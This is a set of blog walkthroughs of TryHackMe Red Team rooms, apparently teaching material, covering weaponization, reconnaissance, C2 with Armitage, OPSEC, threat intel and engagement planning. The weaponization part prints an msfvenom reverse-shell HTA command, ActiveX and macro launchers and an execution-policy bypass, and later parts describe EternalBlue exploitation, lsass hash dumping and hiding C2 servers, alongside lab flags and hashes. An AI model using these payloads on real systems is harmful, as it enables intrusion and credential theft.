Red Team: Initial Access – Weaponization | Try Hack Me

Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on. However, this room steps it up a bit and has us create payloads for exploiting machines. Consequently, i’m going to try and reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.

Weaponization Cyber Kill Chain

The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. Beneath, you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.

Weaponization Cyber Kill Chain
Weaponization Cyber Kill Chain

Furthermore, the room explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It then goes on to explain that some organizations block or monitor the execution of .exe files but that there are alternatives such as the ones listed below.

  • The Windows Script Host (WSH)
  • An HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

Windows Scripting Host Weaponization

Windows Operating Systems have a built-in tool to run batch files called Windows Scripting Host. Furthermore, this scripting host tool allows for the execution of certain scripts. The room challenges us to write a script that creates a context box that says “Welcome to THM”. This can be achieved with the following code which can then be double-clicked or run from the command line.

Dim message 
message = "Welcome to THM"
MsgBox message

Next, the room challenges you to produce a script that can launch the calculator. This is fairly simple as it provides the script you need to run. However, it then asks you to produce a script to launch cmd.exe by telling you to replace calc.exe with cmd.exe. Although, it seems that this didn’t work for me. I did a bit of googling but didn’t find a solution.

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

HTML Application Weaponization

HTML Applications are insanely cool. They allow you to create a file and host them on a web server for an unsuspecting victim to click and run. Therefore, if an unsuspecting victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and if run by a victim would open a command prompt.

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Moreover, you can use msfvenom to create reverse shell payload HTA applications. Similarly, this can also be hosted on a web server and if run by the victim would grant the attacker access to their machine. For example, the code below can be used to create an HTA application with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta

However, a far similar method of performing this type of attack is to the hta_server module in Metasploit. This module requires hardly any configuration and will automatically host the application for you. All the attacker would need to do is send the link to their victim and wait for them to run it.

Visual Basic for Application Weaponization

Visual Basic applications are another really cool way of delivering a payload. For example, Microsoft Office documents support macros which can be used to execute Visual Basic. Macros can be accessed by clicking View then macros. You then need to give the macro a name and the script to be executed. For example, the script below will run calc.exe.

Sub PoC()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub
Visual Basic for Application Weaponization
Visual Basic for Application Weaponization

There is a lot more to this section which you should definitely read through but this covers the basics. This is something I will definitely be adding to my list of exploits as it is very powerful if you can trick a user into running macros.

PowerShell Weaponization

PowerShell scripts are great for compromising machines. In fact, you can use PowerShell can execute a reverse shell directly or can download externally hosted payloads and execute that to create a reverse shell. However, one problem that we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.

powershell -ex bypass -File thm.ps1

Command And Control – (C2 Or C&C)

This section of the room covers information about C2’s or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is good to read through this information to reinforce what was learned in the C2 room. There are no questions to answer here.

Red Team Part 5 – Intro to C2 | TryHackMe
Red Team Part 5 – Intro to C2 | TryHackMe

Delivery Techniques

This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present. It discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckys outside a police station. An officer picks up one of the USBs and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB rubber ducky then check out my guide on how to use a Digispark.

Hack Any Computer In 2 Seconds With this £2 Device | Digispark
Hack Any Computer In 2 Seconds With this £2 Device | Digispark

Practice Arena

In order to complete the practice arena, I used the hta_server Metasploit module that was mentioned previously. Furthermore, It didn’t require any configuration, all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would however strongly encourage you to do this yourself rather than copying and pasting the answer.

THM{b4dbc2f16afdfe9579030a929b799719}

Red Team: Initial Access – Red Team Reconnaissance | Try Hack Me

Hello world and welcome to HaXeZ, in this post I’m going to be discussing the Red Team Reconnaissance room on TryHackMe. This room focuses on the reconnaissance techniques used by Red Teamers to gather information about their target. To elaborate, the room covers the following topics:

  • The types of reconnaissance activities.
  • WHOIS and DNS-based reconnaissance.
  • Advanced searching.
  • Searching by image.
  • Google hacking.
  • Specialized search engines.
  • Recon-ng.
  • Maltego.

Taxonomy of Reconnaissance

This task discusses the two different types of reconnaissance that Red Team members use to profile their target.

Passive Reconnaissance

Firstly, it explains that passive reconnaissance is carried out without interacting with the target. Furthermore, it explains that this shouldn’t require sending a single packet to the target. This type of reconnaissance is known as Open Source Intelligence (OSINT). For example, querying domain and IP address information, and finding email addresses and employee names through social media sites like Linked In.  

Active Reconnaissance

Active reconnaissance is the opposite of passive reconnaissance and the process of gathering information by interacting with the target. For example, using Nmap and other tools to scan their infrastructure to identify active services and weaknesses is considered active reconnaissance.

External Reconnaissance

External recon is anything that takes place outside the target’s network. It primarily focuses on externally facing infrastructure that is publically accessible from the internet. This could be anything from web servers to mail servers.

Internal Reconnaissance

Internal reconnaissance takes place within the target network. For example, this could be facilitated by the Red Teamer physically turning up to their building and accessing the network via a port. Although, it could be done remotely via a VPN solution into the network. This type of reconnaissance would utilize tools like Nessus, OpenVAS, and other vulnerability scanning tools to identify weaknesses within their network.

Built-In Reconnaissance Tools

This task focuses on learning to use built-in tools that most operating systems come with. These tools include:

  • Whois.
  • Dig.
  • Nslookup.
  • Host.
  • Traceroute/Tracert.

Whois

The first tool that is discussed in the room is whois. Whois is a tool for querying information about a domain name. This tool will return information about the WHOIS server, the registrar URL, the domain registration date, the expiration date, the registrant contact information. However, sometimes this information is protected via domain privacy so it can be hit and miss as to how much information you can get from it.

Nslookup

The next tool discussed in this room is nslookup. Nslookup is a tools used to query DNS records from the nameserver. I’ve covered DNS and nslookup in detail in one of my other posts https://haxez.org/2022/05/domain-name-system-simplified/. This tool can be useful to find hidden records.

Dig

Digg.com, how I miss your former self, what happened to you? Alas, dig has nothing to do with Digg.com but always makes me think about it whenever I use it. Dig, short for Domain Internet Groper is another tool used to query name servers for DNS records. 

Host

Host is a tool used to resolve domain names to IP addresses. It does more than that but let’s keep it simple for now. It can query DNS servers for DNS records and show you what IP address those records resolve to.

Traceroute

If you’ve ever worked in technical support then it is likely that you know what a traceroute is. Essentially, it will trace your route to the specified target. Furthermore, it will show you the hops it takes to the target. This can be good for identifying connectivity issues.

There are a number of questions to answer. I would strongly recommend you go and find the answers to yourself but here we go. You can use the whois and host tools to get these answers so go do it instead of copying and pasting.

When was thmredteam.com created (registered)?
2021-09-24

To how many IPv4 addresses does clinic.thmredteam.com resolve?
2

To how many IPv6 addresses does clinic.thmredteam.com resolve?
2

Advanced Searching

This section of the room discusses advanced searching techniques. It explains how to use certain keywords to find specific search results. This can be used to find certain file types on specific websites. Furthermore, it can be used to find pages containing specific texts on specific websites. This technique is primarily known as Google Dorking but other search engines support this functionality. There isn’t much more to say about this section of the room, I have covered Google Dorking and other OSINT techniques here Hack To Learn: OSINT and Passive Reconnaissance

How would you search using Google for xls indexed for htttp://clinic.thmredteam.com?
filetype:xls site:clinic.thmredteam.com

How would you search using Google for files with the word passwords for http://clinic.thmredteam.com?
passwords site:clinic.thmredteam.com

Specialized Reconnaissance Search Engines

There are a number of specialized search engines that have been built specifically for gathering information about targets. These search engines range from performing DNS searches, Censys information, and a search for all internet-connected devices which allows the user to search via services and even vulnerabilities.

ViewDNS.info

ViewDNS.info is a website that has many different utilities for performing passive reconnaissance against the target. It reminds me of MX Toolbox due to the many different tools available. This is a good web application to have bookmarked for your reconnaissance phases.

This room also discusses the threatintelligenceplatform.com and https://search.censys.io/ web applications which I would highly recommend you check out. I won’t be going into much more detail in this write-up as the information is available on TryHackMe.

ViewDNS.info Reconnaissance
ViewDNS.info Reconnaissance

Shodan

Finally, the room talks about Shodan. Shodan is an amazing tool that gives the user Mr. Robot-like powers. It allows you to perform searches for internet-connected devices but has a number of powerful search operators. Additionally, these operators allow the user to filter results based on variables like geographical location, operating system, services available, and many others.

Shodan Reconnaissance
Shodan Reconnaissance
What is the shodan command to get your Internet-facing IP address?
shodan myip

Recon-ng Reconnaissance

Recon-ng can be compared to Metasploit in that it is a framework. However, it is a framework for Open source Intelligence rather than exploitation. It offers a number of features including the ability to create workspaces for your target. Furthermore, it can also be linked to a database to save information about the target. It also has a marketplace that you can use to search for and install tools. Please see the video at the end of the post for a demonstration of this tool.

This room has a number of questions that you should try to answer yourself. However, I have provided the answers below as it’s always good to have a reference.

How do you start recon-ng with the workspace clinicredteam
recon-ng -w clinicredteam

How many modules with the name virustotal
2

here is a single module under hosts-domains. What is its name?
migrate_hosts

censys_email_address is a module that “retrieves email addresses from the TLS certificates for a company.” Who is the author?
Censys Team

Maltego Reconnaissance

Maltego is a fantastic tool that allows you to rapidly perform Open Source Intelligence gathering against your target. For example, you can input a domain name and then use one of the many transforms available. These transforms use open-source platforms such as search engines to gather information about the target. They can return entities like server IP addresses, mailboxes, and many others. The community edition limits you to a set number of transform results but it is still very powerful and a fun tool to check out. Please check out my OSINT video for a demonstration https://www.youtube.com/watch?v=csZaWzFhmCs.

Conclusion

This was a fun room that taught me a few things I didn’t know about reconnaissance. I realize that this post is poorly regurgitating the information available on TryHackMe. These posts are mainly for my benefit as it helps me to reinforce my learning by using multiple methods of consuming the information. If I create a video and a write-up about it then there is no way I will forget it right? Anyway, let me know what you thought about the room, and please check out the video below.

Dumping Windows NTLM Password Hashes With Armitage C2

Hello world and welcome to HaXeZ, in this post I’m going to explain how to dump NTLM hashes using Armitage. Armitage, (created by Raphael Mudge) is a C2 or command and control application that provides a GUI for Metasploit. Furthermore, it allows for the creation of team servers which allows for multiple users to interact with the same workspace. I decided to make this post due to the difficulties I had with the Introduction to C2 room on TryHackMe.

Setting Up Armitage

First, we need to set up Armitage. In order to do this, we need to clone the GitLab repository found here. Next, we need to run the package.sh script to set it up. Once the setup is complete, we need to start Postgresql.

systemctl start postgresql

Once Postgresql is up and running, we need to drop the existing Metasploit database and initialize a new one. This can be achieved by running the msfdb delete and msfdb init commands as shown below. Please be advised that the screenshots are from the attack box on TryHackMe.

Setting Up Armitage
Setting Up Armitage

Creating Armitage Team Server

While this isn’t entirely necessary, we will next use the teamserver binary located at /opt/armitage/releases/unix to create a teamserver. In order to create the teamserver, we need to run the binary followed by our IP and password. The IP is your eth0 IP and the password is anything you want it to be.

./teamserver <YOUR-IP> <YOUR-PASSWORD>
Creating Armitage Team Server
Creating Armitage Team Server

Starting Armitage

Next, we need to start the C2 or Command and Control application itself. In order to this we need to run the Armitage binary from the /opt/armitage/releases/unix directory. No other arguments are needed, just punch it into the CLI and wait for the window.

Starting Armitage
Starting Armitage

Connecting

Once you run the binary, a window will pop up. Using the information from the teamserver CLI, populate the required information. The application will then attempt to connect to the Postgresql database with the supplied credentials (you remember your password right). The reason we need to connect to the database is that Armitage heavily relies on the Metasploit database.

Connecting
Connecting

Armitage Nickname

This is by far the most important part of any engagement. Whether it’s Red Teaming, Hacking, or Penetration Testing. Having an awesome hacker handle is crucial to success and without it, you will be doomed to fail. Ok, maybe not but this is the part where you need to choose your username. This is the username that your Armitage teammates will see you as so choose something incredibly cringy and embarrassing.

Nickname
Nickname

Add The Target

In order to dump those precious hashes, you need a target. Again, I’m following the TryHackMe Introduction to C2 room. The target of my nefarious hacking activities will be the box named Blue which is vulnerable to Eternal Blue. In order to add the host, click hosts and click add hosts. You will then be presented with a window similar to the one below. Punch in the IP address and click ok.

Add The Target
Add The Target

Exploiting The Target

In order to exploit the target, we need to locate the Eternal Blue exploit from the menu. Under Exploit, Windows, SMB, grab the ms17_010_eternal exploit and drag it over the target. The exploit you need to use will depend entirely on the target you want to attack. I’m using Blue as the target because it is an easy machine to hack. Believe it or not, Blue loves being hacked.

Exploiting The Target
Exploiting The Target

Configuring The Payload

Funnily enough, you don’t actually need to do anything to configure the payload. This section of the article is a complete waste of space. Leave the settings as default and click launch. The only reason this section of the article exists is that I took a screenshot. So yeah, drag the payload over the host. Don’t change the settings. Click launch.

Configuring The Payload
Configuring The Payload

Shell To Meterpreter

If you successfully exploited the target, you should have some lovely ASCII showing WIN (provided you’re exploiting Blue). That’s fantastic, however, it isn’t. You have managed to get yourself a standard shell as NT AUTHORITY. Don’t get me wrong, this shell is good for most things but let’s face it, we want a Meterpreter shell. Well, there is an easy way to upgrade to a Meterpreter shell. Just use the search box for shell_to_meterpreter and drag it onto the host. This should spawn a new Meterpreter shell.

Shell To Meterpreter
Shell To Meterpreter

Migrate To Exfiltrate

You now have your Meterpreter session open and sure you can attempt to dump hashes now. However, if you do, you will likely not get all the user’s hashes. At least that was my experience when attempting to dump Ted’s hash on the TryHackMe room. In order to dump Ted’s hash, we need to migrate our process. There are arguments to be made about which process to migrate to. Migrating to certain processes will be a lot more stealthy. This is something I intend to cover in future posts. However, for now, migrate to the lsass.exe process. This will give you the access required to dump the hashes. If you’re wondering how to do this then right-click the host, select Meterpreter, select Explore, then select show process. The rest is fairly straightforward.

Migrate To Exfiltrate
Migrate To Exfiltrate

Dump Those Hashes

Finally, we are ready to dump the hashes. In order to get that elusive hash of Ted, all we need to do is click Meterpreter, Access, and Dump Hashes. You will get a number of methods, the method I chose was the Lsass method. This worked straight away and dumped Teds hash to the terminal as you can see below. Granted, we already had the administrator hash was already ours but it’s annoying not hacking everyone isn’t it?

Dump Those Hashes
Dump Those Hashes

Conclusions

Ok, I may have gone a bit overboard on the graphics. I’m also sure that this write-up is full of spelling mistakes and graphical errors. If you can forgive that, then I hope this has helped you solve the TryHackMe introduction to C2 room. I will admit that I struggled with this room having never used Armitage before. I could have rinsed it using Metasploit but that wasn’t the point of the room. God knows how long I tried to set up Armitage on my Kali virtual machine. I eventually gave up and used the TryHackMe attack box. As for Armitage itself, it could THM attack box but I thought it was slower than using Metasploit. Anyway, I had a lot of fun with this one. Big thanks to Rummy for helping out.

Red Team Part 5 – Intro to C2 | TryHackMe

Hello world and welcome to HaXeZ where today we’re going to be getting a bit more technical and looking at C2s. To clarify, C2 is short for Command and Control and is a central location from which to control all your compromised devices. If you’re interested in Red Team engagements or cybersecurity in general then head over to TryHackMe and level up your skills.

Task 1 – Introduction

As with most first rooms on TryHackMe, the first room is an introduction room and explains what is going to be covered. Not much to talk about here other than that we will be covering how Command and Control Frameworks work. Then, we will cover the various components that Command and Controls use. After that, we will cover the basic setup of a Command and Control Framework. Furthermore, the room covers how to use Armitage and Metasploit.

Task 1 - Introduction
Task 1 – Introduction

Task 2 – Command and Control Framework Structure

This section of the room has a lot of information to digest. In short, the room explains what a Command and Control Framework is, the structure of a Command and Control, how to obfuscate agent callbacks, payload types, and a lot more. Overall, the information contained in this section is essential. For example, it explains that a C2 agent is similar to a Netcat reverse shell. Furthermore, it elaborates on beacons and explains how beacons are callbacks to the main Command and Control server and that unless confiscated can be easily recognized.

Task 2 - Command and Control Framework Structure
Task 2 – Command and Control Framework Structure
Question: What is the component's name that lives on the victim machine that calls back to the C2 server?
Answer: Agent

Question: What is the beaconing option that introduces a random delay value to the sleep timer?
Answer: Jitter

Question: What is the term for the first portion of a Staged payload?
Answer: Dropper

Question: What is the name of the communication method that can potentially allow access to a restricted network segment that communicates via TCP ports 139 and 
Answer: SMB Beacon

Task 3 – Common C2 Frameworks

Next, task 3 discusses the various different Command and Control frameworks. It breaks them down into free and premium versions. Notably, it covers Metasploit, Armitage, Powershell Empire, Covenant, and Sliver. It then covers the premium Command and Control frameworks such as Cobalt Strike and Brute Ratel.

Task 3 - Common C2 Frameworks
Task 3 – Common C2 Frameworks

Task 4 – Setting Up a C2 Framework

The next room covers how to set up a Command and Control Framework. Notably, it focuses on Armitage and how you can clone the framework from Gitlab. It then discusses how Metasploit needs to be set up correctly as Armitage heavily relies on Metasploit’s database. Furthermore, it explains how Armitage can be used by multiple people provided they have the IP address, port, username, and password. For more information on this section please refer to the video at the end.

Task 4 - Setting Up a C2 Framework
Task 4 – Setting Up a C2 Framework

Task 5 – C2 Operation Basics

The next section, section 5 covers C2 operation basics. Furthermore, it explains how best to hide your C2 server from those pesky Blue Team security analysts. It discusses how Cobalt Strike servers could be easily identified due to an additional space in the HTTP header. Moreover, it explains how things like Cloudflare and virtual hosts can be used to hide your C2 server.

Task 5 - C2 Operation Basics
Task 5 – C2 Operation Basics
Question: Which listener should you choose if you have a device that cannot easily access the internet?
Answer: DNS

Question: Which listener should you choose if you're accessing a restricted network segment?
Answer: SMB

Question: Which listener should you choose if you are dealing with a Firewall that does protocol inspection?
Answer: HTTPS


Task 6 – Command, Control, and Conquer

Section 6 of this room covers using Armitage to exploit hosts. In particular, it walks through performing a Nmap scan against the vulnerable virtual machine Blue. Consequently, the host is vulnerable to the Eternal Blue vulnerability which you can then exploit through Armitage. Once the exploit is complete you can then perform a post-exploitation investigation directly through the terminal. Again, see the video at the end for more information.

Task 6 - Command, Control, and Conquer
Task 6 – Command, Control, and Conquer
Question: What flag can be found after gaining Administrative access to the PC?
Answer: THM{bd6ea6c871dced619876321081132744}

Question: What is the Administrator's NTLM hash?
Answer: c156d5d108721c5626a6a054d6e0943c

Question: What flag can be found after gaining access to Ted's user account?
Answer: THM{217fa45e35f8353ffd04cfc0be28e760}

Question: What is Ted's NTLM Hash?
Answer: 2e2618f266da8867e5664425c1309a5c


Task 7 – Advanced C2 Setups

This section of the room covers advanced C2 setups. It goes into more detail about setting up Apache and virtual hosts. These efforts are to attempt to avoid detection by a security analyst which could result in the server getting reported and shut down. This section has some great advise on how you can configure the Apache server to only respond with the C2 if the header include a certain User Agent.

Task 7 - Advanced C2 Setups
Task 7 – Advanced C2 Setups


Task 8 – Wrapping Up / Conclusions

The last room in the series summarizes what was covered in the room and how to choose a framework. I thoroughly enjoyed this room as I was recently looking at C2s and couldn’t find one I liked. I looked at Chaos but had a lot of issues getting it to work. Nevertheless, this room has been educational and has pointed me in the right direction on how to set up and use a full-fledged C2.

Task 8 - Wrapping Up / Conclusions
Task 8 – Wrapping Up / Conclusions

Red Team Part 4 – Red Team OPSEC | TryHackMe

Hello world and welcome to HaXeZ, where today we’re continuing the Red Team path on TryHackMe and looking at OPSEC. In essence, TryHackMe is a digital playground that lets you level up and test out your hacking skills. For this reason, I would recommend everyone who is interested in Cybersecurity and hacking go and check it out as there is always something new to learn.

Task 1 – Introduction

The first task in this room is the standard introduction room. Although, this task does actually have more technical information than the previous introduction rooms. The author discusses a term coined by the United States military known as OPSEC. Furthermore, they explain how OPSEC can be broken down into five steps: Critical Information, Threats, Vulnerabilities, Risks, and Countermeasures.

Task 1 Introduction
Task 1 Introduction

Task 2 – Critical Information Identification

The next task discusses critical information identification. Moreover, the author explains what a Red Team might consider critical information. For example, things like the Red Team’s capabilities, activities, and limitations could be considered critical information if the Blue Team knew it.

Task 2 - Critical Information Identification
Task 2 – Critical Information Identification

THM{OPSEC_CRITICAL_INFO}

Task 3 – Red Team Threat Analysis

The subject of task 3 is threat analysis and explains that threat analysis can be broken down into the following questions.

  1. Who is the adversary?
  2. What are the adversary’s goals?
  3. What tactics, techniques, and procedures does the adversary use?
  4. What critical information has the adversary obtained, if any?

With that in mind, the author discusses how the Blue Team could be considered a threat. To explain, if the Blue Team were to learn of the TTP’s of the Red Team then they would be able to mitigate them.

Task 3 - Red Team Threat Analysis
Task 3 – Red Team Threat Analysis

Task 4 – Vulnerability Analysis

The fourth task discusses vulnerability analysis but not in the traditional sense of computer analyzing system vulnerabilities. In short, OPSEC vulnerability analysis is analyzing when an adversary can obtain critical information, analyze findings and act in a way that would jeopardize your plan.

Task 4 - Vulnerability Analysis
Task 4 – Vulnerability Analysis

Task 5 – Red Team Risk Assessment

The purpose of a Red Team risk assessment is, funnily enough, to assess risk. The author explains that the risk could be using the same IP address to perform Nmap scans, exploit with Metasploit and run a phishing campaign. Consequently, if a member of the Blue Team were to identify a single IP address, they could block it and disrupt all operations.

Task 5 - Red Team Risk Assessment
Task 5 – Red Team Risk Assessment

Task 6 – Countermeasures

In task 6 the author discusses countermeasures. Specifically, they discuss the previous example of scanning, exploiting, and phishing from the same IP address. In short, they explain that countermeasures should be deployed so that not all areas will be affected if one IP address gets blocked.

Task 6 - Countermeasures
Task 6 – Countermeasures

Task 7 – More Practical Examples

While the information in this section was great, I thought the questions were awful. I will expand upon that in a moment. This section covers more practical examples such as disguising your computer’s operating system so it isn’t easily identified as a threat. The information here is great, it explains how changing your hostname so that it isn’t something like Kali2021vm or Attack Box would be a good step. However, the questions in this room seemed unnecessarily obscure. If your questions are difficult due to the way they are worded and how you answer them then are you really testing the reader’s knowledge? It may just be me but these questions slowed my progress significantly as it wasn’t immediately obvious which answer belong to which and how to even answer the questions.

Task 7 - More Practical Examples
Task 7 – More Practical Examples
Answers:
4 5 2 3 1
1 5 4 3 2
5 2 4 3 1
2 3 1 5 4

Task 8 – Red Team OPSEC Summary/Conclusions

With the exception of the questions in Task 7, I enjoyed this room a lot. It allowed me to think about the Red Team from a different perspective. It was interesting to follow the thought process of a Red Team having to keep their own stuff secure and analyze their own risks. It’s easy to overlook this side of things as the Red Team is the offensive team and it hadn’t occurred to me that they too need to play defensively. Anyway, great room. I hate to criticize the questions in task 7, the creator is far more knowledgeable than me and the content thus far has been amazing. However, that section completely interrupted the flow of the room.

Red Team Part 3 – Red Team Threat Intel | TryHackMe

Hello world and welcome to HaXeZ, in this post we’re going to be walking through the 3rd Red Team challenge in the Red Team Fundamentals room on Try Hack Me. Moreover, this room covers how a Red Team uses the TTP’s of known APT to emulate attacks by an advisory.

Task 1 – Introduction

The first room is as expected, the introduction. Ultimately, this section of the room explains what will be covered. In summary, it covers the basics of threat intelligence, creating threat-intel-driven campaigns, and using frameworks.

Task 1 - Introduction
Task 1 – Introduction

Task 2 – What is Threat Intelligence

Next, the author talks about threat intelligence and how collecting indicators of compromise and TTPs is good for Cyber Threat Intelligence. Furthermore, it explains that there are intelligence platforms and frameworks such as ISAC that can provide this information.

Task 2 - What is Threat Intelligence
Task 2 – What is Threat Intelligence

Task 3 – Applying Threat Intel to the Red Team

The third task explains how teams can use Cyber Threat Intelligence (CTI) to aid in adversary emulation. Additionally, it explains how frameworks such as Mitre ATT&CK and Tiber-EU can be used to map the TTP’s of the adversary to known cyber kill chains.

Task 3 - Applying Threat Intel to the Red Team
Task 3 – Applying Threat Intel to the Red Team

Task 4 – The TIBER-EU Framework

The Tiber-EU framework was developed by the European Central bank and focuses on the use of threat intelligence. As can be seen, they have broken the steps down into three sections, Preparation, Testing, and Closure. Generally speaking, this matches up with other Cyber Kill Chains.

Task 4 - The TIBER-EU Framework
Task 4 – The TIBER-EU Framework

Task 5 – TTP Mapping

Tactics, techniques, and procedures are the skills that advanced persistent threats tend to be attributed with. Because of that, databases have been created showing the various TTP’s used by specific APT’s. Furthermore, these TTP’s can be mapped to the Cyber Kill chain which makes it easier for Red Teams to plan out an engagement where they are emulating an APT.

Task 5 - TTP Mapping
Task 5 – TTP Mapping
Question: How many Command and Control techniques are employed by Carbanak?
Answer: 2

Question: What signed binary did Carbanak use for defense evasion?
Answer: Rundll32

Question: What Initial Access technique is employed by Carbanak? 
Answer: Valid Accounts

Task 6 – Other Red Team Applications of CTI

Although we have already discussed emulating an APT, this task covers it in more detail. For example, it discusses how a Red Team would emulate C2 user traffic, ports and protocols, and listener profiles. Additionally, the author explains how manipulating host headers, POST URI, and server response headers can also be used to emulate an APT.

Task 6 - Other Red Team Applications of CTI
Task 6 – Other Red Team Applications of CTI

Task 7 – Creating a Threat Intel-Driven Campaign

The purpose of this task is to help the reader better understand how threats can map to the cyber kill chain. While the room started off well, I couldn’t get along with the first question. To explain, the reader is tasked with looking through the information pertaining to a specific APT. The reader then needs to map the TTP’s to layers in the cyber kill chain. Nevertheless, I struggled with this as none of the answers I was putting seemed to be correct.

Answers
Answers
Question: Once the chain is complete and you have received the flag, submit it below.
Answer: THM{7HR347_1N73L_12 _4w35om3}

Question: What web shell is APT 41 known to use? 
Answer: ASPXSpy

Question: What LOLBAS (Living Off The Land Binaries and Scripts) tool does APT 41 use to aid in file transfers? 
Answer: certutil

Question: What tool does APT 41 use to mine and monitor SMS traffic? 
Answer: MESSAGETAPc


Task 8 – Red Team Threat Intel Conclusion

The conclusion of this room explains what we have learned. I won’t recite it word for word but I will provide my own conclusion. I was quite surprised to learn that there was such emphasis on emulating real advanced persistent threats. Granted, that would be the goal of an engagement but I didn’t think a team would go to such lengths to plan out an engagement. I enjoyed this room except for the questions in task 7.

Task 8 - Red Team Threat Intel Conclusion
Task 8 – Red Team Threat Intel Conclusion

Red Team Part 2 – Red Team Engagements | TryHackMe

Hello world and welcome to Haxez, in this post I’m going to be talking about Red Team Engagements. Again, for those who haven’t been following along, this is the Red Teaming learning path on TryHackMe. Furthermore, If you’re interested in cybersecurity or hacking then I would highly recommend giving it a look.

Task 1 – Red Team Engagements Introduction

As with most of the educational rooms on TryHackMe, the first room introduces the topic being discussed. Notably, it discusses the different types of Red Team engagements whether its a Tabletop exercise, Adversary emulation, or Physical assessment. Furthermore, it goes on to explain what the following tasks are going to discuss. Not much more to say about the task than that. There is a “question” in this room but it doesn’t require an answer.

Task 1 - Red Team Engagements Introduction
Task 1 – Red Team Engagements Introduction

Task 2 – Defining Scope and Objectives

The second task in the room focuses on defining the scope and objectives. Including, why it is important to agree upon the scope with the client. It discusses how and why IP ranges, domain names, and other information should be included. Additionally, it discusses why it is important to understand the client’s objectives.

Task 2 - Defining Scope and Objectives
Task 2 – Defining Scope and Objectives
Question: What CIDR range is permitted to be attacked?
Answer: 10.0.4.0/22

Question: is the use of white cards permitted? (Y/N)
Answer: Y

Question: Are you permitted to access "*.bethechange.xyz?" (Y/N)
Answer: N

Task 3 – Rules of Engagement

The next task in the room discusses the rules of engagement document. In essence, the rules of engagement documents are exactly that. They are legally binding contracts outlining what the client’s objectives are. Furthermore, they explain the scope of the engagement. Additionally, they include all the stakeholders.

Task 3 - Rules of Engagement
Task 3 – Rules of Engagement
Question: How many explicit restrictions are specified?
Answer: 3

Question: What is the first access type mentioned in the document?
Answer: Phishing

Question: Is the red team permitted to attack 192.168.1.0/24? (Y/N)
Answer: N

Task 4 – Red Team Campaign Planning

The next task in the room is titled campaign planning. In summary, it explains how each Red Team engagement can be broken down into four plans. The engagement plan contains all the technical requirements. An operations plan is an expansion of the engagement plan but goes into further details. A mission plan that includes the exact commands to run and at what time. The remediation plan which contains information on what happens once the campaign has finished. There are no questions in this room.

Task 4 – Red Team Campaign Planning

Task 5 – Engagement Documentation

The fifth task in the room further elaborates on the planning phase by discussing the engagement documentation. Furthermore, the engagement documentation matches up with the planning phase accordingly. The author discusses what each of the documents may contain but that this may vary from organization to organization. If you’ve worked in the IT industry for a while, you will understand that each company does things differently.

Task 5 - Engagement Documentation
Task 5 – Engagement Documentation

Task 6 – Concept of Operation

Further expanding on the engagement documentation, task 6 explains the Concept of Operation (CONOPS) document. In essence, the CONOPS document contains can be compared to a penetration test executive summary. For example, an executive summary is a high-level document aimed at executives who may not have a high technical understanding. It further explains that it should include the client’s name, timeframe, objectives, and tools to be used.

Task 6 - Red Team Concept of Operation
Task 6 – Concept of Operation

Task 7 – Resource Plan

The resource plan discussed in task 7 is a document that details the overview of the dates and resource requirements. However, this document should be written as a bulleted list rather than a summary. Furthermore, there is no defined standard for this document. It is likely that these documents will vary from company to company.

Task 7 - Red Team Resource Plan
Task 7 – Resource Plan
Question: When will the engagement end? (MM/DD/YYYY)
Answer: 11/14/2021

Question: What is the budget the red team has for AWS cloud cost?
Answer: $1000

Question: Are there any miscellaneous requirements for the engagement? (Y/N)
Answer: N

Task 8 – Operations Plan

An operations plan is a document that provides details on the engagement and what will take place. This document should be more detailed than the CONOPS document and may possibly contain the Rules of Engagement document. Furthermore, it too should be a bulleted list like the resource plan. It should include things like stopping conditions, assigned personnel, TTP’s, and communication plans.

Task 8 - Red Team Operations Plan
Task 8 – Operations Plan
Question: What phishing method will be employed during the initial access phase?
Answer: Spearphishing

Question: What site will be utilized for communication between the client and red cell?
Answer: vectr.io

Question: If there is a system outage, the red cell will continue with the engagement. (T/F)
Answer: F

Task 9 – Mission Plan

The 9th task in this room discusses the mission plan document. In essence, this document is specific to each cell and the details should be completed by the operators. Furthermore, the document should cover the objectives, operators, exploits, targets, and execution plan.

Task 9 - Mission Plan
Task 9 – Mission Plan
Question: When will the phishing campaign end? (mm/dd/yyyy)
Answer: 10/23/2021

Question: Are you permitted to attack 10.10.6.78? (Y/N)
Answer: N

Question: When a stopping condition is encountered, you should continue working and determine the solution yourself without a team lead. (T/F)
Answer: F

Task 10 – Red Team Engagements Conclusions

The last task in the room is the conclusion. There isn’t much to say about this so I will use this section to give my own conclusions. Granted the information in these tasks isn’t exactly fun like hands-on labs. However, I appreciate the material for what it is. It doesn’t just teach you the technical skills needed to be a Red Team operator, it teaches you the process and procedures too. A lot of online learning resources tend to fail in this area by not being able to strike a good balance. TryHackMe excels in giving you both sides of the information.

Red Team Part 2 – Red Team Engagements | TryHackMe

Red Team Part 1 – Red Team Fundamentals | TryHackMe

Hello world and welcome to Haxez, in this post I’m going to be going through the first room in the Red Team learning path on TryHackMe. The first room doesn’t require a lot of technical skills. It is mostly just reading and getting to grips with the terminology of what a Red Team is.

Task 1 – Red Team Introduction

